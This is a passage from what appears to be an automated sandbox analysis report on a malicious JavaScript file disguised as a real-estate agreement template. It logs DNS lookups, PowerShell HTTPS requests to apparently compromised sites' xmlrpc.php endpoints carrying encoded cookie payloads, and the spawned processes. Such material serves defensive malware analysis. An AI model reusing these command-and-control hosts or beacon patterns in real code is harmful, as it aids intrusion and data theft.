                                      May 6, 2024 18:42:04.745017052 CEST44349712153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:04.745156050 CEST49712443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:04.745574951 CEST49712443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:04.762640953 CEST44349711153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:04.762700081 CEST44349711153.127.91.146192.168.2.7
                                      May 6, 2024 18:42:04.762825966 CEST49711443192.168.2.7153.127.91.146
                                      May 6, 2024 18:42:04.763376951 CEST49711443192.168.2.7153.127.91.146

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      May 6, 2024 18:41:16.210324049 CEST5121453192.168.2.71.1.1.1
                                      May 6, 2024 18:41:16.684261084 CEST53512141.1.1.1192.168.2.7
                                      May 6, 2024 18:41:40.037209034 CEST5007053192.168.2.71.1.1.1
                                      May 6, 2024 18:41:40.399203062 CEST53500701.1.1.1192.168.2.7
                                      May 6, 2024 18:41:40.518161058 CEST5197653192.168.2.71.1.1.1
                                      May 6, 2024 18:41:40.846422911 CEST53519761.1.1.1192.168.2.7
                                      May 6, 2024 18:42:02.417515993 CEST5813753192.168.2.71.1.1.1
                                      May 6, 2024 18:42:02.886982918 CEST53581371.1.1.1192.168.2.7

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      May 6, 2024 18:41:16.210324049 CEST192.168.2.71.1.1.10xc771Standard query (0)naturalanimals.netA (IP address)IN (0x0001)false
                                      May 6, 2024 18:41:40.037209034 CEST192.168.2.71.1.1.10xe29fStandard query (0)weissenbach-pr.deA (IP address)IN (0x0001)false
                                      May 6, 2024 18:41:40.518161058 CEST192.168.2.71.1.1.10xd5ecStandard query (0)memar98.comA (IP address)IN (0x0001)false
                                      May 6, 2024 18:42:02.417515993 CEST192.168.2.71.1.1.10xb02dStandard query (0)tennoji-law-uranai.comA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      May 6, 2024 18:41:16.684261084 CEST1.1.1.1192.168.2.70xc771No error (0)naturalanimals.net91.198.66.211A (IP address)IN (0x0001)false
                                      May 6, 2024 18:41:40.399203062 CEST1.1.1.1192.168.2.70xe29fNo error (0)weissenbach-pr.de78.46.3.78A (IP address)IN (0x0001)false
                                      May 6, 2024 18:41:40.846422911 CEST1.1.1.1192.168.2.70xd5ecNo error (0)memar98.com195.28.10.122A (IP address)IN (0x0001)false
                                      May 6, 2024 18:42:02.886982918 CEST1.1.1.1192.168.2.70xb02dNo error (0)tennoji-law-uranai.com153.127.91.146A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • naturalanimals.net
                                      • weissenbach-pr.de
                                      • memar98.com
                                      • tennoji-law-uranai.com

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.74970891.198.66.2114436768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-05-06 16:41:17 UTC2095OUTGET /xmlrpc.php HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
                                      Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g+sY1qlsVaFrs8IDI2axK4daJHy8TNkUx5yke8udy6InO3aaDF8cOvhEyUm02G4ZiAdW9oAi+gVB48hmb6VzOydy8z+4ZOBJzlk4GQGDLHnOc/2vYNknLSrRQUeeXnZoScGEbvaVXgW3Knygnxb5YdhsB3sNNqtwdOkFMIHsFzBuWROMFqJvCiaQrQe3hg3WQ0td9eCKBkBntVCP6xH9v8EsTmR+JajdgMI62PNJYT [TRUNCATED]
                                      Host: naturalanimals.net
                                      Connection: Close
                                      2024-05-06 16:41:19 UTC381INHTTP/1.1 405 Method Not Allowed
                                      Server: nginx
                                      Date: Mon, 06 May 2024 16:41:19 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/8.0.30
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Allow: POST
                                      Set-Cookie: PHPSESSID=2opl9jclbrpt353fmi9b8sot5n; path=/
                                      2024-05-06 16:41:19 UTC53INData Raw: 32 61 0d 0a 58 4d 4c 2d 52 50 43 20 73 65 72 76 65 72 20 61 63 63 65 70 74 73 20 50 4f 53 54 20 72 65 71 75 65 73 74 73 20 6f 6e 6c 79 2e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 2aXML-RPC server accepts POST requests only.0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.74970978.46.3.784436768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-05-06 16:41:40 UTC2082OUTGET /xmlrpc.php HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
                                      Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W7CMAz8leUH9g8MdRrSGBOF8Vy1brFIYmOnhUr5+LnNpjzkIt+d77Jh9tg2CSm+SxPggzRl11K8FqCtIK9AVO1KfaCYXddoYXbeF2b3CNnBkz0JSHY9xdTJVGa7zkN2XpvFYg+BZH7ZUmABVVzs9nRW2pryQnJb5Ie+xxa2Fu12ouNoFKYHiF7B++yOMKAmmQ2NMWGAN6FVVkMj7XXDnJ2CTGZhC+tBwj9BsSTS0EiybgBxeSy5lIm [TRUNCATED]
                                      Host: weissenbach-pr.de
                                      Connection: Close
                                      2024-05-06 16:41:41 UTC482INHTTP/1.1 405 Method Not Allowed
                                      Date: Mon, 06 May 2024 16:41:41 GMT
                                      Server: Apache
                                      X-Powered-By: PHP/8.0.30
                                      Allow: POST
                                      Set-Cookie: _icl_current_language=de; expires=Tue, 07-May-2024 16:41:41 GMT; Max-Age=86400; path=/
                                      Set-Cookie: _icl_current_language=de; expires=Tue, 07-May-2024 16:41:41 GMT; Max-Age=86400; path=/
                                      Upgrade: h2
                                      Connection: Upgrade, close
                                      Vary: User-Agent
                                      Cache-Control: s-maxage=10
                                      Transfer-Encoding: chunked
                                      Content-Type: text/plain;charset=utf-8
                                      2024-05-06 16:41:41 UTC53INData Raw: 32 61 0d 0a 58 4d 4c 2d 52 50 43 20 73 65 72 76 65 72 20 61 63 63 65 70 74 73 20 50 4f 53 54 20 72 65 71 75 65 73 74 73 20 6f 6e 6c 79 2e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 2aXML-RPC server accepts POST requests only.0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.749710195.28.10.1224433952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-05-06 16:41:41 UTC2076OUTGET /xmlrpc.php HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
                                      Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W7CMAz8leUH9g8MdRrSGBOF8Vy1brFIYmOnhUr5+LnNpjzkIt+d77Jh9tg2CSm+SxPggzRl11K8FqCtIK9AVO1KfaCYXddoYXbeF2b3CNnBkz0JSHY9xdTJVGa7zkN2XpvFYg+BZH7ZUmABVVzs9nRW2pryQnJb5Ie+xxa2Fu12ouNoFKYHiF7B++yOMKAmmQ2NMWGAN6FVVkMj7XXDnJ2CTGZhC+tBwj9BsSTS0EiybgBxeSy5lIm [TRUNCATED]
                                      Host: memar98.com
                                      Connection: Close
                                      2024-05-06 16:41:42 UTC186INHTTP/1.1 403 Forbidden
                                      Server: nginx
                                      Date: Mon, 06 May 2024 16:41:41 GMT
                                      Content-Type: text/html; charset=iso-8859-1
                                      Content-Length: 199
                                      Connection: close
                                      Vary: Accept-Encoding
                                      2024-05-06 16:41:42 UTC199INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.749712153.127.91.1464436768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-05-06 16:42:03 UTC2079OUTGET /xmlrpc.php HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
                                      Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g9dxbRKY51KO55RMNRqErt2oEXKxy+QTX7wSb673GXH7NB2ESm8S+fhgzQmYylcC1AryBsQ1bzi4Ckk03damL1zhdk/fDLwZEcCksxAIfYyl9uhd5CM0261qMGTLC978iygiqtdTRelfVa2JLdVfhwGtLDP0W5nOk2ZwvQA0Ss4l8wJRtQoS0ZTiOjhTWiTNdCJve6Yk1GQOVvkB5tR/D9BsSRSv0ZRJnI6Z0rsJNY [TRUNCATED]
                                      Host: tennoji-law-uranai.com
                                      Connection: Close
                                      2024-05-06 16:42:04 UTC374INHTTP/1.1 405 Method Not Allowed
                                      Server: nginx
                                      Date: Mon, 06 May 2024 16:42:04 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 42
                                      Connection: close
                                      Set-Cookie: PHPSESSID=29lrn63q00o1k4qm11qad10nl6; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                      Pragma: no-cache
                                      Allow: POST
                                      2024-05-06 16:42:04 UTC42INData Raw: 58 4d 4c 2d 52 50 43 20 73 65 72 76 65 72 20 61 63 63 65 70 74 73 20 50 4f 53 54 20 72 65 71 75 65 73 74 73 20 6f 6e 6c 79 2e
                                      Data Ascii: XML-RPC server accepts POST requests only.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.749711153.127.91.1464433952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-05-06 16:42:03 UTC2079OUTGET /xmlrpc.php HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
                                      Cookie: 1C5A6FBD41=H4sIAAAAAAAEAI1U246bMBD9FfPWSi3aXISi5skBk7jFGNkm2QdElCbOCpWbgO3uSqjfXgOhIZso3QcsZs6ZsWfm2NBxfI4Y9xi1sYNC81vgFdlTsUusXbWrNeh5FhSw8fulLMrgWGRpdZDlrwDmecMJWLZLovSp1swsSbL0FG5HsSwH6UDrCDpOZ9yK+PQ6Mz5fhYHWfS94Y0wn4/9uR4nnC8RcSFBoM+oKC/EfXz2zTcZzuW8ybKL0kL2UQflWVjKZjIN9ctDlq6w1q4h+y6IpesjjPa+Dy+BMq7UVJchieN10trM8KFbh+2bWmkNN6Hyg206238UNfUldNbg1YmEQXNbi+mSB2JbaWzVVE3FOGQ/HtUZT2R7tVvoeUywenirbuqLWmuOiRxHqqnlzHT2iub6AYq6bxJrr6wVvFuX7zptP/Wy43SyruU64qWieo3L0x9hCZq6wQKbwGQohsYzpEMUWcgW2saoJp5WMjSmwlbbiN2AAkh1kDEbTCeCVzHMlODD7ApYyfY5S2bKHmRy0Rk5oDF0MrTHH1A1nx4eZAs4qvxL9XQlfwvf0+o95W5wK9hcONs/j8J5/xtG+1jpF9bPqbZZl1UB3tSYQ8c7BnQb+jC6VEgiZ5Ir6YWbzGliUQOy+uyFnYMsoJNhd9m/GNa+9YANxN77BC3Ml/hdVUlRcFEf5huCQRPsiK7NjBU4AGD0A1cW/9tdonLcEAAA=; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g9dxbRKY51KO55RMNRqErt2oEXKxy+QTX7wSb673GXH7NB2ESm8S+fhgzQmYylcC1AryBsQ1bzi4Ckk03damL1zhdk/fDLwZEcCksxAIfYyl9uhd5CM0261qMGTLC978iygiqtdTRelfVa2JLdVfhwGtLDP0W5nOk2ZwvQA0Ss4l8wJRtQoS0ZTiOjhTWiTNdCJve6Yk1GQOVvkB5tR/D9BsSRSv0ZRJnI6Z0rsJNY [TRUNCATED]
                                      Host: tennoji-law-uranai.com
                                      Connection: Close
                                      2024-05-06 16:42:04 UTC374INHTTP/1.1 405 Method Not Allowed
                                      Server: nginx
                                      Date: Mon, 06 May 2024 16:42:04 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 42
                                      Connection: close
                                      Set-Cookie: PHPSESSID=aamhmofo78d8otgv956pljdj71; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                      Pragma: no-cache
                                      Allow: POST
                                      2024-05-06 16:42:04 UTC42INData Raw: 58 4d 4c 2d 52 50 43 20 73 65 72 76 65 72 20 61 63 63 65 70 74 73 20 50 4f 53 54 20 72 65 71 75 65 73 74 73 20 6f 6e 6c 79 2e
                                      Data Ascii: XML-RPC server accepts POST requests only.


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:5
                                      Start time:18:37:53
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\real estate co ownership agreement template 43632.js"
                                      Imagebase:0x7ff7c7e50000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:17
                                      Start time:19:50:30
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wscript.EXE DEVELO~1.JS
                                      Imagebase:0x7ff7c7e50000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:19
                                      Start time:19:50:49
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\cscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
                                      Imagebase:0x7ff72bed0000
                                      File size:161'280 bytes
                                      MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:20
                                      Start time:19:50:49
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:21
                                      Start time:19:50:56
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wscript.EXE DEVELO~1.JS
                                      Imagebase:0x7ff7c7e50000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:22
                                      Start time:19:51:07
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:powershell
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:23
                                      Start time:19:51:16
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\cscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
                                      Imagebase:0x7ff72bed0000
                                      File size:161'280 bytes
                                      MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:24
                                      Start time:19:51:16
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:25
                                      Start time:19:51:33
                                      Start date:06/05/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:powershell
                                      Imagebase:0x7ff741d30000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Disassembly

                                      No disassembly